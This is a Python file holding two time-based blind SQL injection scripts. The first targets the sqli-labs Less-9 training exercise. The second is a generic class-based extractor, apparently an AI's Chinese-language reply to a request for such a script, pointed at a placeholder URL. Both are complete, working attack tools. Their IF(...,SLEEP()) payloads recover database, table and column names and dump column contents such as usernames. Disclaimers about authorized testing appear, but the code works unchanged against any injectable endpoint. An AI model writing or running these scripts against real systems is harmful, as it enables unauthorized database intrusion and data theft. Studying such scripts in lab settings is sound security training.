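import time

# Time-based blind SQL injection helper written against the sqli-labs Less-9
# exercise (a deliberately vulnerable training target).  The page looks the
# same for true and false conditions, so the only oracle is the extra latency
# that MySQL's sleep() adds when the injected condition holds.
#
# Original poster's request (translated from Chinese): "write me a similar
# Python time-based blind injection script".

# Seconds passed to sleep(); also the decision threshold, so it must clearly
# exceed the target's normal response-time jitter or probes get misclassified.
SLEEP_SECONDS = 0.4
# Upper bound for the length search so an unresponsive oracle cannot spin forever.
MAX_LENGTH = 4096
# Socket timeout per request; keep it well above SLEEP_SECONDS so a "true"
# probe (which always takes at least SLEEP_SECONDS) is not cut off.
REQUEST_TIMEOUT = 10


def _http_probe(url, condition):
    """Send one probe and return True when the server delayed its answer.

    ``condition`` is a MySQL boolean expression; it is spliced into the
    injected ``id`` parameter as ``if(<condition>,sleep(...),1)`` and the
    round-trip time decides the answer.  Network errors and timeouts
    propagate as ``requests`` exceptions.
    """
    # Imported here so the search logic stays importable (and testable) on
    # machines without the requests package.
    import requests

    data = f"id=1' and if({condition},sleep({SLEEP_SECONDS}),1)--+"
    start_time = time.time()
    requests.get(url, params=data, timeout=REQUEST_TIMEOUT)
    return time.time() - start_time >= SLEEP_SECONDS


def get_data_len(url, data_payload, probe=None):
    """Return LENGTH(``data_payload``) by asking "longer than n?" for n = 1, 2, ...

    The loop stops at the first n for which the oracle says "no", which is the
    exact length.  A NULL or empty value therefore reports 1 (same as the
    original script).  ``probe`` replaces the HTTP oracle for tests or other
    transports; it receives ``(url, condition)`` and returns a bool.
    """
    probe = _http_probe if probe is None else probe
    length = 1
    # MAX_LENGTH bounds the walk; the original looped unboundedly.
    while length < MAX_LENGTH and probe(url, f"LENGTH({data_payload})>{length}"):
        length += 1
    return length


def get_ASCII(url, ascii_payload, length=None, probe=None):
    """Recover the string value of SQL expression ``ascii_payload``.

    Each character position is binary-searched over printable ASCII (32..126)
    with ``ASCII(SUBSTRING(...))>mid`` probes, about 7 requests per character.
    ``length`` is the number of characters to extract; when omitted it is
    measured with ``get_data_len``.  (The original iterated over
    ``len(ascii_payload)`` -- the length of the SQL text, not of the data --
    which padded results with spaces or truncated them.)  Characters outside
    32..126 cannot be recovered and come back as the nearest bound.
    """
    probe = _http_probe if probe is None else probe
    if length is None:
        length = get_data_len(url, ascii_payload, probe=probe)
    chars = []
    for i in range(1, length + 1):
        left, right = 32, 126
        while left <= right:
            mid = left + (right - left) // 2
            condition = f"ASCII(SUBSTRING({ascii_payload}, {i}, 1))>{mid}"
            if probe(url, condition):
                left = mid + 1
            else:
                right = mid - 1
        chars.append(chr(left))
    return "".join(chars)


def get_schema_name(url):
    """Print the name of the current database."""
    db_len = get_data_len(url, 'database()')  # not `len`: don't shadow the builtin
    print('获取数据库名字')
    db_name = get_ASCII(url, 'database()', length=db_len)
    print(db_name)


def get_table_name(url):
    """Print the comma-separated table names of the current database."""
    table_name = get_ASCII(
        url,
        '(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database())',
    )
    print(table_name)


def get_column_names(url, table_name):
    """Print the comma-separated column names of ``table_name`` in the current database."""
    # Restricting to the current schema keeps this consistent with get_table_name
    # and with get_column_data, which reads the unqualified table.
    column_names = get_ASCII(
        url,
        f"(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns "
        f"WHERE table_name='{table_name}' AND table_schema=database())",
    )
    print(column_names)


def get_column_data(url, table_name, column_name):
    """Print the comma-separated values of ``column_name`` in ``table_name``."""
    column_data = get_ASCII(url, f"(SELECT GROUP_CONCAT({column_name}) FROM {table_name})")
    print(column_data)


if __name__ == "__main__":
    # The script supplies the id parameter itself, so the URL is just the
    # endpoint (the original had a stray "??id=1/" appended).  Only run this
    # against a target you are authorized to test.
    url = "http://192.168.124.128/sqli-labs-master/Less-9/"
    print('开始')
    get_schema_name(url)
    print()
    get_table_name(url)
    get_column_names(url, 'emails')
    table_name = 'emails'
    column_name = 'email_id'
    get_column_data(url, table_name, column_name)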
好的,以下是一个简单的时间盲注脚本示例:
```python
import requests
import time
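class TimeBasedSQLi:
    """Time-based blind SQL injection extractor for a MySQL backend.

    Every question is asked as ``IF(<condition>,SLEEP(t),1)`` spliced into the
    ``id`` query parameter; the response time is the only oracle, so
    ``sleep_time`` must be clearly larger than the target's normal latency
    jitter or true/false probes become indistinguishable.  Use only against
    targets you are authorized to test.
    """

    # Upper bound on the measured length of any value; stops a broken oracle
    # (e.g. a target that always answers slowly) from looping forever.
    MAX_LENGTH = 4096

    def __init__(self, url, sleep_time=0.5, timeout=None):
        """
        Args:
            url: endpoint whose ``id`` query parameter is injectable.
            sleep_time: seconds passed to SLEEP() and used as the decision threshold.
            timeout: per-request socket timeout in seconds; defaults to
                ``4 * sleep_time + 5`` so a "true" probe (which always takes at
                least ``sleep_time``) is not cut off, while a dead host no longer
                hangs the scan indefinitely.
        """
        self.url = url
        self.sleep_time = sleep_time
        self.timeout = timeout if timeout is not None else 4 * sleep_time + 5

    def make_request(self, payload):
        """Send one probe; return True when the response took >= sleep_time seconds.

        Network errors and timeouts propagate as ``requests`` exceptions.
        """
        data = {"id": f"1' AND {payload} AND '1'='1"}
        start_time = time.time()
        requests.get(self.url, params=data, timeout=self.timeout)
        return time.time() - start_time >= self.sleep_time

    def _is_true(self, condition):
        """Ask the oracle whether the MySQL boolean ``condition`` holds."""
        return self.make_request(f"IF({condition},SLEEP({self.sleep_time}),1)")

    def _length_of(self, expr):
        """Return LENGTH(expr) via "longer than n?" probes for n = 1, 2, ...

        Stops at the first n the oracle rejects, which is the exact length
        (NULL/empty values report 1).  Bounded by MAX_LENGTH.
        """
        length = 1
        while length < self.MAX_LENGTH and self._is_true(f"LENGTH(({expr}))>{length}"):
            length += 1
        return length

    def _extract(self, expr):
        """Recover the string value of SQL expression ``expr`` character by character.

        Each position is binary-searched over printable ASCII 32..126 with
        ``ASCII(SUBSTRING(...))>mid`` probes (about 7 requests per character
        instead of up to 95 equality probes).  Characters outside that range
        cannot be recovered and come back as the nearest bound.
        """
        length = self._length_of(expr)
        chars = []
        # range(1, length + 1): the original used range(1, length) and dropped
        # the last character of every value.
        for pos in range(1, length + 1):
            low, high = 32, 126
            while low <= high:
                mid = (low + high) // 2
                if self._is_true(f"ASCII(SUBSTRING(({expr}),{pos},1))>{mid}"):
                    low = mid + 1
                else:
                    high = mid - 1
            chars.append(chr(low))
        return "".join(chars)

    def get_db_name(self):
        """Return the name of the current database."""
        return self._extract("database()")

    def get_table_names(self):
        """Return the list of table names in the current database."""
        # database() is used directly instead of re-extracting the name
        # character by character just to quote it into the WHERE clause.
        return self._extract(
            "SELECT GROUP_CONCAT(table_name) FROM information_schema.tables "
            "WHERE table_schema=database()"
        ).split(",")

    def get_column_names(self, table_name):
        """Return the list of column names of ``table_name`` in the current database."""
        # The schema filter keeps this consistent with get_column_data, which
        # reads the unqualified table from the current database.
        return self._extract(
            "SELECT GROUP_CONCAT(column_name) FROM information_schema.columns "
            f"WHERE table_name='{table_name}' AND table_schema=database()"
        ).split(",")

    def get_column_data(self, table_name, column_name):
        """Return the list of values of ``column_name`` in ``table_name``."""
        return self._extract(
            f"SELECT GROUP_CONCAT({column_name}) FROM {table_name}"
        ).split(",")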
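# Example usage.  Guarded so importing this module does not fire probes at
# the target; point it at an endpoint you are authorized to test and pick a
# sleep_time that clearly exceeds the target's normal response jitter.
if __name__ == "__main__":
    url = "http://example.com/vuln.php"
    sqli = TimeBasedSQLi(url)
    db_name = sqli.get_db_name()
    print(f"Database name: {db_name}")
    table_names = sqli.get_table_names()
    print(f"Table names: {table_names}")
    column_names = sqli.get_column_names('users')
    print(f"Column names: {column_names}")
    column_data = sqli.get_column_data('users', 'username')
    print(f"Column data: {column_data}")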
```
注意,这只是一个基本的脚本示例,具体的使用方法和payload需要根据实际情况进行调整:sleep_time 必须明显大于目标的正常响应抖动,否则真/假分支会被误判;每个请求都应设置超时,避免目标无响应时脚本永久挂起;并且只能用于已获得授权的测试目标。